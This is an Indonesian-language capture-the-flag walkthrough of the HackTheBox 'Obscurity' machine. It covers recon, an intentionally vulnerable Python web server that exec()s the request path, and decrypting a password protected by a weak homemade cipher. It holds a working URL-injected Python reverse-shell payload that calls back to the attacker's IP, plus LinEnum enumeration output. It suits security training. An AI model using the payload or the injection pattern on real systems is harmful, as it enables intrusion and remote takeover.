HackTheBox Obscurity
Mari kita lakukan recon pertama-tama, dengan menggunakan nmap
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 |
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 00:54 EST Nmap scan report for 10.10.10.168 Host is up (0.31s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 33:d3:9a:0d:97:2c:54:20:e1:b0:17:34:f4:ca:70:1b (RSA) | 256 f6:8b:d5:73:97:be:52:cb:12:ea:8b:02:7c:34:a3:d7 (ECDSA) |_ 256 e8:df:55:78:76:85:4b:7b:dc:70:6a:fc:40:cc:ac:9b (ED25519) 80/tcp closed http 8080/tcp open http-proxy BadHTTPServer | fingerprint-strings: | GetRequest: | HTTP/1.1 200 OK | Date: Fri, 06 Dec 2019 05:55:37 | Server: BadHTTPServer | Last-Modified: Fri, 06 Dec 2019 05:55:37 | Content-Length: 4171 | Content-Type: text/html | Connection: Closed | <!DOCTYPE html> | <html lang="en"> | <head> | <meta charset="utf-8"> | <title>0bscura</title> | <meta http-equiv="X-UA-Compatible" content="IE=Edge"> | <meta name="viewport" content="width=device-width, initial-scale=1"> | <meta name="keywords" content=""> | <meta name="description" content=""> | <!-- | Easy Profile Template | http://www.templatemo.com/tm-467-easy-profile | <!-- stylesheet css --> | <link rel="stylesheet" href="css/bootstrap.min.css"> | <link rel="stylesheet" href="css/font-awesome.min.css"> | <link rel="stylesheet" href="css/templatemo-blue.css"> | </head> | <body data-spy="scroll" data-target=".navbar-collapse"> | <!-- preloader section --> | <!-- | <div class="preloader"> | <div class="sk-spinner sk-spinner-wordpress"> | HTTPOptions: | HTTP/1.1 200 OK | Date: Fri, 06 Dec 2019 05:55:38 | Server: BadHTTPServer | Last-Modified: Fri, 06 Dec 2019 05:55:38 | Content-Length: 4171 | Content-Type: text/html | Connection: Closed | <!DOCTYPE html> | <html lang="en"> | <head> | <meta charset="utf-8"> | <title>0bscura</title> | <meta http-equiv="X-UA-Compatible" content="IE=Edge"> | <meta name="viewport" content="width=device-width, initial-scale=1"> | <meta name="keywords" content=""> | <meta name="description" content=""> | <!-- | Easy Profile Template | http://www.templatemo.com/tm-467-easy-profile | <!-- stylesheet css --> | <link rel="stylesheet" href="css/bootstrap.min.css"> | <link rel="stylesheet" href="css/font-awesome.min.css"> | <link rel="stylesheet" href="css/templatemo-blue.css"> | </head> | <body data-spy="scroll" data-target=".navbar-collapse"> | <!-- preloader section --> | <!-- | <div class="preloader"> |_ <div class="sk-spinner sk-spinner-wordpress"> |_http-server-header: BadHTTPServer |_http-title: 0bscura 9000/tcp closed cslistener 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8080-TCP:V=7.80%I=7%D=12/6%Time=5DE9ED1C%P=x86_64-pc-linux-gnu%r(Ge SF:tRequest,10FC,"HTTP/1\.1\x20200\x20OK\nDate:\x20Fri,\x2006\x20Dec\x2020 SF:19\x2005:55:37\nServer:\x20BadHTTPServer\nLast-Modified:\x20Fri,\x2006\ SF:x20Dec\x202019\x2005:55:37\nContent-Length:\x204171\nContent-Type:\x20t SF:ext/html\nConnection:\x20Closed\n\n<!DOCTYPE\x20html>\n<html\x20lang=\" SF:en\">\n<head>\n\t<meta\x20charset=\"utf-8\">\n\t<title>0bscura</title>\ SF:n\t<meta\x20http-equiv=\"X-UA-Compatible\"\x20content=\"IE=Edge\">\n\t< SF:meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20initial-s SF:cale=1\">\n\t<meta\x20name=\"keywords\"\x20content=\"\">\n\t<meta\x20na SF:me=\"description\"\x20content=\"\">\n<!--\x20\nEasy\x20Profile\x20Templ SF:ate\nhttp://www\.templatemo\.com/tm-467-easy-profile\n-->\n\t<!--\x20st SF:ylesheet\x20css\x20-->\n\t<link\x20rel=\"stylesheet\"\x20href=\"css/boo SF:tstrap\.min\.css\">\n\t<link\x20rel=\"stylesheet\"\x20href=\"css/font-a SF:wesome\.min\.css\">\n\t<link\x20rel=\"stylesheet\"\x20href=\"css/templa SF:temo-blue\.css\">\n</head>\n<body\x20data-spy=\"scroll\"\x20data-target SF:=\"\.navbar-collapse\">\n\n<!--\x20preloader\x20section\x20-->\n<!--\n< SF:div\x20class=\"preloader\">\n\t<div\x20class=\"sk-spinner\x20sk-spinner SF:-wordpress\">\n")%r(HTTPOptions,10FC,"HTTP/1\.1\x20200\x20OK\nDate:\x20 SF:Fri,\x2006\x20Dec\x202019\x2005:55:38\nServer:\x20BadHTTPServer\nLast-M SF:odified:\x20Fri,\x2006\x20Dec\x202019\x2005:55:38\nContent-Length:\x204 SF:171\nContent-Type:\x20text/html\nConnection:\x20Closed\n\n<!DOCTYPE\x20 SF:html>\n<html\x20lang=\"en\">\n<head>\n\t<meta\x20charset=\"utf-8\">\n\t SF:<title>0bscura</title>\n\t<meta\x20http-equiv=\"X-UA-Compatible\"\x20co SF:ntent=\"IE=Edge\">\n\t<meta\x20name=\"viewport\"\x20content=\"width=dev SF:ice-width,\x20initial-scale=1\">\n\t<meta\x20name=\"keywords\"\x20conte SF:nt=\"\">\n\t<meta\x20name=\"description\"\x20content=\"\">\n<!--\x20\nE SF:asy\x20Profile\x20Template\nhttp://www\.templatemo\.com/tm-467-easy-pro SF:file\n-->\n\t<!--\x20stylesheet\x20css\x20-->\n\t<link\x20rel=\"stylesh SF:eet\"\x20href=\"css/bootstrap\.min\.css\">\n\t<link\x20rel=\"stylesheet SF:\"\x20href=\"css/font-awesome\.min\.css\">\n\t<link\x20rel=\"stylesheet SF:\"\x20href=\"css/templatemo-blue\.css\">\n</head>\n<body\x20data-spy=\" SF:scroll\"\x20data-target=\"\.navbar-collapse\">\n\n<!--\x20preloader\x20 SF:section\x20-->\n<!--\n<div\x20class=\"preloader\">\n\t<div\x20class=\"s SF:k-spinner\x20sk-spinner-wordpress\">\n"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 55.18 seconds |
Mari kita coba akses service http yang ada di port 8080
Ada tampilan seperti halaman blog tentang 0bscura, jika scroll kebawah maka kita akan mendapatkan clue seperti
Nampaknya pembuat box menginginkan kita menemukan script python SuperSecureServer.py yang ada di sebuah directory. Maka untuk mencarinya kita bisa menggunakan wfuzz
1 |
wfuzz -c -z file,rockyou.txt --hc 404 http://10.10.10.168:8080/FUZZ/SuperSecureServer.py |
Kita menemukan script SuperSecureServer.py di directory develop
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 |
import socket import threading from datetime import datetime import sys import os import mimetypes import urllib.parse import subprocess respTemplate = """HTTP/1.1 {statusNum} {statusCode} Date: {dateSent} Server: {server} Last-Modified: {modified} Content-Length: {length} Content-Type: {contentType} Connection: {connectionType} {body} """ DOC_ROOT = "DocRoot" CODES = {"200": "OK", "304": "NOT MODIFIED", "400": "BAD REQUEST", "401": "UNAUTHORIZED", "403": "FORBIDDEN", "404": "NOT FOUND", "500": "INTERNAL SERVER ERROR"} MIMES = {"txt": "text/plain", "css":"text/css", "html":"text/html", "png": "image/png", "jpg":"image/jpg", "ttf":"application/octet-stream","otf":"application/octet-stream", "woff":"font/woff", "woff2": "font/woff2", "js":"application/javascript","gz":"application/zip", "py":"text/plain", "map": "application/octet-stream"} class Response: def __init__(self, **kwargs): self.__dict__.update(kwargs) now = datetime.now() self.dateSent = self.modified = now.strftime("%a, %d %b %Y %H:%M:%S") def stringResponse(self): return respTemplate.format(**self.__dict__) class Request: def __init__(self, request): self.good = True try: request = self.parseRequest(request) self.method = request["method"] self.doc = request["doc"] self.vers = request["vers"] self.header = request["header"] self.body = request["body"] except: self.good = False def parseRequest(self, request): req = request.strip("\r").split("\n") method,doc,vers = req[0].split(" ") header = req[1:-3] body = req[-1] headerDict = {} for param in header: pos = param.find(": ") key, val = param[:pos], param[pos+2:] headerDict.update({key: val}) return {"method": method, "doc": doc, "vers": vers, "header": headerDict, "body": body} class Server: def __init__(self, host, port): self.host = host self.port = port self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.sock.bind((self.host, self.port)) def listen(self): self.sock.listen(5) while True: client, address = self.sock.accept() client.settimeout(60) threading.Thread(target = self.listenToClient,args = (client,address)).start() def listenToClient(self, client, address): size = 1024 while True: try: data = client.recv(size) if data: # Set the response to echo back the recieved data req = Request(data.decode()) self.handleRequest(req, client, address) client.shutdown() client.close() else: raise error('Client disconnected') except: client.close() return False def handleRequest(self, request, conn, address): if request.good: # try: # print(str(request.method) + " " + str(request.doc), end=' ') # print("from {0}".format(address[0])) # except Exception as e: # print(e) document = self.serveDoc(request.doc, DOC_ROOT) statusNum=document["status"] else: document = self.serveDoc("/errors/400.html", DOC_ROOT) statusNum="400" body = document["body"] statusCode=CODES[statusNum] dateSent = "" server = "BadHTTPServer" modified = "" length = len(body) contentType = document["mime"] # Try and identify MIME type from string connectionType = "Closed" resp = Response( statusNum=statusNum, statusCode=statusCode, dateSent = dateSent, server = server, modified = modified, length = length, contentType = contentType, connectionType = connectionType, body = body ) data = resp.stringResponse() if not data: return -1 conn.send(data.encode()) return 0 def serveDoc(self, path, docRoot): path = urllib.parse.unquote(path) try: info = "output = 'Document: {}'" # Keep the output for later debug exec(info.format(path)) # This is how you do string formatting, right? cwd = os.path.dirname(os.path.realpath(__file__)) docRoot = os.path.join(cwd, docRoot) if path == "/": path = "/index.html" requested = os.path.join(docRoot, path[1:]) if os.path.isfile(requested): mime = mimetypes.guess_type(requested) mime = (mime if mime[0] != None else "text/html") mime = MIMES[requested.split(".")[-1]] try: with open(requested, "r") as f: data = f.read() except: with open(requested, "rb") as f: data = f.read() status = "200" else: errorPage = os.path.join(docRoot, "errors", "404.html") mime = "text/html" with open(errorPage, "r") as f: data = f.read().format(path) status = "404" except Exception as e: print(e) errorPage = os.path.join(docRoot, "errors", "500.html") mime = "text/html" with open(errorPage, "r") as f: data = f.read() status = "500" return {"body": data, "mime": mime, "status": status} |
Penulis kurang mengerti maksud dari pembuat box karena menurut penulis, script yang diberikan kurang lengkap atau memang disengaja tidak diperlihatkan semuanya, tidak ada body dari scriptnya hanya object-object. Namun ada satu bagian yang menarik perhatian, yaitu fungsi exec di bagian serveDoc. Kita mungkin bisa melakukan RCE, namun perlu menelurusi scriptnya terlebih dahulu baru mendapatkan entry point dari command kita.
Memasukkan directory random, akan menghasilkan code 404, penulis juga menemukan xss reflected yang tadinya dikira bisa digunakan somehow
Namun saat penulis ingin mengembangkan vuln xss tersebut, penulis menemukan hal yang ganjil, setiap kita memasukkan tanda ‘ maka page akan mereturn connection reset
Saat ini penulis memiliki 2 dugaan, bahwa jalan yang harus dilalui adalah exploitasi xss namun ada firewall atau blacklist, atau RCE melalui input url directory seperti yang diduga dari awal setelah membaca script SuperSecureServer.py
Kita ternyata bisa melakukan RCE dan revshell melalui input url tadi
1 |
http://10.10.10.168:8080/';s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.218%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);' |
Kita mendapatkan revshell sebagai www-data, abaikan error message EOL tersebut.
Masuk ke directory home/robert kita bisa melihat user.txt
Namun www-data tidak memiliki permission untuk membuka user.txt, kita harus mengauthentikasi sebagai robert
Isi dari file check.txt
1 |
Encrypting this file with your key should result in out.txt, make sure your key is correct! |
Isi dari file out.txt
1 2 3 |
¦ÚÈêÚÞØÛÝÝ ×ÐÊß ÞÊÚÉæßÝËÚÛÚêÙÉëéÑÒÝÍÐ êÆáÙÞãÒÑÐáÙ¦ÕæØãÊÎÍßÚêÆÝáäè ÎÍÚÎëÑÓäáÛÌ× v |
Isi dari file SuperSecureCrypt.py
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 |
import sys import argparse def encrypt(text, key): keylen = len(key) keyPos = 0 encrypted = "" for x in text: keyChr = key[keyPos] newChr = ord(x) newChr = chr((newChr + ord(keyChr)) % 255) encrypted += newChr keyPos += 1 keyPos = keyPos % keylen return encrypted def decrypt(text, key): keylen = len(key) keyPos = 0 decrypted = "" for x in text: keyChr = key[keyPos] newChr = ord(x) newChr = chr((newChr - ord(keyChr)) % 255) decrypted += newChr keyPos += 1 keyPos = keyPos % keylen return decrypted parser = argparse.ArgumentParser(description='Encrypt with 0bscura\'s encryption algorithm') parser.add_argument('-i', metavar='InFile', type=str, help='The file to read', required=False) parser.add_argument('-o', metavar='OutFile', type=str, help='Where to output the encrypted/decrypted file', required=False) parser.add_argument('-k', metavar='Key', type=str, help='Key to use', required=False) parser.add_argument('-d', action='store_true', help='Decrypt mode') args = parser.parse_args() banner = "################################\n" banner+= "# BEGINNING #\n" banner+= "# SUPER SECURE ENCRYPTOR #\n" banner+= "################################\n" banner += " ############################\n" banner += " # FILE MODE #\n" banner += " ############################" print(banner) if args.o == None or args.k == None or args.i == None: print("Missing args") else: if args.d: print("Opening file {0}...".format(args.i)) with open(args.i, 'r', encoding='UTF-8') as f: data = f.read() print("Decrypting...") decrypted = decrypt(data, args.k) print("Writing to {0}...".format(args.o)) with open(args.o, 'w', encoding='UTF-8') as f: f.write(decrypted) else: print("Opening file {0}...".format(args.i)) with open(args.i, 'r', encoding='UTF-8') as f: data = f.read() print("Encrypting...") encrypted = encrypt(data, args.k) print("Writing to {0}...".format(args.o)) with open(args.o, 'w', encoding='UTF-8') as f: f.write(encrypted) |
Isi dari file passwordreminder.txt
1 |
´ÑÈÌÉàÙÁÑ鯷¿k |
Kita diberikan sebuah plaintext (check.txt ) sebuah output (out.txt ) dan sebuah script untuk enkripsinya (SuperSecureCrypt.py ) dan password dari user robert (passwordreminder.txt ). Mari kita reverse dan dapatkan key nya untuk melakukan decrypt password robert.
Penulis membuat script dibawah ini untuk mereverse key nya
1 2 3 4 5 6 7 8 9 10 11 12 13 |
#!/usr/bin/env python3 with open('check.txt', 'r', encoding='UTF-8') as f: text = f.read() with open('out.txt', 'r', encoding='UTF-8') as s: enc = s.read() key = "" for i in range(0,len(text)): if(ord(enc[i]) > ord(text[i])): key += chr(ord(enc[i]) - ord(text[i])) elif(ord(enc[i]) < ord(text[i])): key += chr(255+ord(text[i]) + ord(enc[i])) print(key) |
Key yang digunakan adalah alexandrovich, mari kita menggunakan SuperSecureCrypt.py untuk decrypt
Password untuk robert didapatkan, SecThruObsFTW
Mari kita login melalui SSH
user.txt : e4493782066b55fe2755708736ada2d7
Berikut hasil dari LinEnum.sh
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656 657 658 659 660 661 662 663 664 665 666 667 668 669 670 671 672 673 674 675 676 677 678 679 680 681 682 683 684 685 686 687 688 689 690 691 692 693 694 695 696 697 698 699 700 701 702 703 704 705 706 707 708 709 710 711 712 713 714 715 716 717 718 719 720 721 722 723 724 725 726 727 728 729 730 731 732 733 734 735 736 737 738 739 740 741 742 743 744 745 746 747 748 749 750 751 752 753 754 755 756 757 758 759 760 761 762 763 764 765 766 767 768 769 770 771 772 773 774 775 776 777 778 779 780 781 782 783 784 785 786 787 788 789 790 791 792 793 794 795 796 797 798 799 800 801 802 803 804 805 806 807 808 809 810 811 812 813 814 815 816 817 818 819 820 821 822 823 824 825 826 827 828 829 830 831 832 833 834 835 836 837 838 839 840 841 842 843 844 845 846 847 848 849 850 851 852 853 854 855 856 857 858 859 860 861 862 863 864 865 866 867 868 869 870 871 872 873 874 875 876 877 878 879 880 881 882 883 884 885 886 887 888 889 890 891 892 893 894 895 896 897 898 899 900 901 902 903 904 905 906 907 908 909 910 911 912 913 914 915 916 917 918 919 920 921 922 923 924 925 926 927 928 929 930 931 932 933 934 935 936 937 938 939 940 941 942 943 944 945 946 947 948 949 950 951 952 953 954 955 956 957 958 959 960 961 962 963 964 965 966 967 968 969 970 971 972 973 974 975 976 977 978 979 980 981 982 983 984 985 986 987 988 989 990 991 992 993 994 995 996 997 998 999 1000 1001 1002 1003 1004 1005 1006 1007 1008 1009 1010 1011 1012 1013 1014 1015 1016 1017 1018 1019 1020 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1101 1102 1103 1104 1105 1106 1107 1108 1109 1110 1111 1112 1113 1114 1115 1116 1117 1118 1119 1120 1121 1122 1123 1124 1125 1126 1127 1128 1129 1130 1131 1132 1133 1134 1135 1136 1137 1138 1139 1140 1141 1142 1143 1144 1145 1146 1147 1148 1149 1150 1151 1152 1153 1154 1155 1156 1157 1158 1159 1160 1161 1162 1163 1164 1165 1166 1167 1168 1169 1170 1171 1172 1173 1174 1175 1176 1177 1178 1179 1180 1181 1182 1183 1184 1185 1186 1187 1188 1189 1190 1191 1192 1193 1194 1195 1196 1197 1198 1199 1200 1201 1202 1203 1204 1205 1206 1207 1208 1209 1210 1211 1212 1213 1214 1215 1216 1217 1218 1219 1220 1221 1222 1223 1224 1225 1226 1227 1228 1229 1230 1231 1232 1233 1234 1235 1236 1237 1238 1239 1240 1241 1242 1243 1244 1245 1246 1247 1248 1249 1250 1251 1252 1253 1254 1255 1256 1257 1258 1259 1260 1261 1262 1263 1264 1265 1266 1267 1268 1269 1270 1271 1272 1273 1274 1275 1276 1277 1278 1279 1280 1281 1282 1283 1284 1285 1286 1287 1288 1289 1290 1291 1292 1293 1294 1295 1296 1297 1298 1299 1300 1301 1302 1303 1304 1305 1306 1307 1308 1309 1310 1311 1312 1313 1314 1315 1316 1317 1318 1319 1320 1321 |
######################################################### # Local Linux Enumeration & Privilege Escalation Script # ######################################################### # www.rebootuser.com # version 0.981 [-] Debug Info [+] Thorough tests = Disabled Scan started at: Sat Jan 4 04:35:38 UTC 2020 ### SYSTEM ############################################## [-] Kernel information: Linux obscure 4.15.0-65-generic #74-Ubuntu SMP Tue Sep 17 17:06:04 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux [-] Kernel information (continued): Linux version 4.15.0-65-generic (buildd@lgw01-amd64-006) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #74-Ubuntu SMP Tue Sep 17 17:06:04 UTC 2019 [-] Specific release information: DISTRIB_ID=Ubuntu DISTRIB_RELEASE=18.04 DISTRIB_CODENAME=bionic DISTRIB_DESCRIPTION="Ubuntu 18.04.3 LTS" NAME="Ubuntu" VERSION="18.04.3 LTS (Bionic Beaver)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 18.04.3 LTS" VERSION_ID="18.04" HOME_URL="https://www.ubuntu.com/" SUPPORT_URL="https://help.ubuntu.com/" BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" VERSION_CODENAME=bionic UBUNTU_CODENAME=bionic [-] Hostname: obscure ### USER/GROUP ########################################## [-] Current user/group info: uid=1000(robert) gid=1000(robert) groups=1000(robert),4(adm),24(cdrom),30(dip),46(plugdev) [-] Users that have previously logged onto the system: Username Port From Latest root tty1 Mon Dec 2 09:53:03 +0000 2019 robert pts/22 10.10.14.218 Sat Jan 4 04:32:28 +0000 2020 [-] Who else is logged on: 04:35:38 up 3:39, 8 users, load average: 0.00, 0.01, 0.03 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT robert pts/0 10.10.14.205 01:07 1:41m 0.04s 0.04s -bash robert pts/8 10.10.15.136 02:33 1:12m 0.08s 0.08s -bash robert pts/11 10.10.15.136 02:54 1:30m 0.04s 0.04s -bash robert pts/18 10.10.15.142 04:30 3:22 0.04s 0.04s -bash robert pts/19 10.10.15.50 04:11 15:20 0.14s 0.01s ssh -R 1337:localhost:22 root@10.10.15.50 robert pts/20 10.10.15.142 04:31 3:30 0.62s 0.62s -bash robert pts/21 10.10.14.41 04:32 18.00s 0.04s 0.04s -bash robert pts/22 10.10.14.218 04:32 2.00s 0.04s 0.00s /bin/bash ./LinEnum.sh [-] Group memberships: uid=0(root) gid=0(root) groups=0(root) uid=1(daemon) gid=1(daemon) groups=1(daemon) uid=2(bin) gid=2(bin) groups=2(bin) uid=3(sys) gid=3(sys) groups=3(sys) uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) uid=5(games) gid=60(games) groups=60(games) uid=6(man) gid=12(man) groups=12(man) uid=7(lp) gid=7(lp) groups=7(lp) uid=8(mail) gid=8(mail) groups=8(mail) uid=9(news) gid=9(news) groups=9(news) uid=10(uucp) gid=10(uucp) groups=10(uucp) uid=13(proxy) gid=13(proxy) groups=13(proxy) uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=34(backup) gid=34(backup) groups=34(backup) uid=38(list) gid=38(list) groups=38(list) uid=39(irc) gid=39(irc) groups=39(irc) uid=41(gnats) gid=41(gnats) groups=41(gnats) uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network) uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve) uid=102(syslog) gid=106(syslog) groups=106(syslog) uid=103(messagebus) gid=107(messagebus) groups=107(messagebus) uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup) uid=105(lxd) gid=65534(nogroup) groups=65534(nogroup) uid=106(uuidd) gid=110(uuidd) groups=110(uuidd) uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup) uid=108(landscape) gid=112(landscape) groups=112(landscape) uid=109(pollinate) gid=1(daemon) groups=1(daemon) uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup) uid=1000(robert) gid=1000(robert) groups=1000(robert),4(adm),24(cdrom),30(dip),46(plugdev) [-] It looks like we have some admin users: uid=1000(robert) gid=1000(robert) groups=1000(robert),4(adm),24(cdrom),30(dip),46(plugdev) [-] Contents of /etc/passwd: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin robert:x:1000:1000:robert:/home/robert:/bin/bash [-] Super user account(s): root [+] We can sudo without supplying a password! Matching Defaults entries for robert on obscure: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User robert may run the following commands on obscure: (ALL) NOPASSWD: /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py [-] Are permissions on /home directories lax: total 12K drwxr-xr-x 3 root root 4.0K Sep 24 22:09 . drwxr-xr-x 24 root root 4.0K Oct 3 15:52 .. drwxr-xr-x 8 robert robert 4.0K Jan 4 04:20 robert ### ENVIRONMENTAL ####################################### [-] Environment information: SSH_CONNECTION=10.10.14.218 34626 10.10.10.168 22 LESSCLOSE=/usr/bin/lesspipe %s %s LANG=en_US.UTF-8 OLDPWD=/home/robert/BetterSSH XDG_SESSION_ID=23 USER=robert PWD=/home/robert HOME=/home/robert SSH_CLIENT=10.10.14.218 34626 22 XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop SSH_TTY=/dev/pts/22 MAIL=/var/mail/robert SHELL=/bin/bash TERM=xterm-256color SHLVL=2 LOGNAME=robert XDG_RUNTIME_DIR=/run/user/1000 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin LESSOPEN=| /usr/bin/lesspipe %s _=/usr/bin/env [-] Path information: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin drwxr-xr-x 2 root root 4096 Sep 24 22:08 /bin drwxr-xr-x 2 root root 12288 Nov 25 11:05 /sbin 